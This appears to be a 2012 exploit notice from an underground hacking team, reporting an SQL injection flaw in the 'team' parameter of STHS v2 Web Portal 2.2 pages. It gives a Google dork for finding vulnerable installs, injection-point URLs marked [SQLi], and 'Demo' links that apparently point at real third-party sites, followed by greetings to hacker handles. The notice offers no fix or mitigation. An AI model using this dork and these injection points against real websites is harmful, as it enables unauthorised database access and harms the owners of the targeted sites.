================================================= STHS v2 Web Portal 2.2 SQL Injection Vulnerabilty ================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 ________ .__ ________ 3 7 \______ \ |__| ______/ __ \ ____ ____ _____ 7 1 | | \ | | / ___/\____ / _/ ___\ / _ \ / \ 1 3 | ` \| | \___ \ / / \ \___ ( <_> )| Y Y \ 3 3 /_______ /|__|/____ > /____/ /\ \___ > \____/ |__|_| / 3 7 \/ \/ \/ \/ \/ 7 1 1 3 >> The Underground Exploitation Team 3 3 3 7 7 1 [+] Site : http://www.Dis9.com 1 3 3 3 3 7 ########################################## 7 1 I'm Liyan Oz Member from 1337 DataBase 1 3 ########################################## 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # # AUthor : Liyan Oz # Title : STHS v2 Web Portal 2.2 SQL Injection Vulnerabilty # Vendor : http://www.simhl.net # Date : 10/02/2012 # Risk : Normal # Tested On : Backtrack Liyan Oz Edition # Contact : ariestiyansyah.rizky@gmail.com # Home : http://0nto.wordpress.com/ # Dork : "powered by SIMHL.net" # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # # Exploit : http://www.site.com/prospects.php?team=[SQLi]' http://www.site.org/prospect.php?team=[SQLi]' http://www.site.net/team.php?team=[SQLi]' # Demo : http://lnhs2.hostpo.net/prospect.php?team=1' http://www.lchv.biz/prospects.php?team=17' # Greetz to ======================================================================== # = My Lovely Junia Astri Damayanti = # # = Dis9 The Underground Exploitation Team [at] www.dis9.com = # # - Kedans Dz - Blackrootkit - Kalashinkov3 - KnockOut - Black-ID - # - Kowalski Howard - 7h1nkz3r0 - ettack - Ackrootkit - ph0n7ric - # - xi4ojin - Nimda - Killer - Dz - 2ext01 - Aoi Sora - X1 - brk - # # - Indonesian Backtrack Team , El N4ck0 , and all my friend ^_^ - #=======================================================================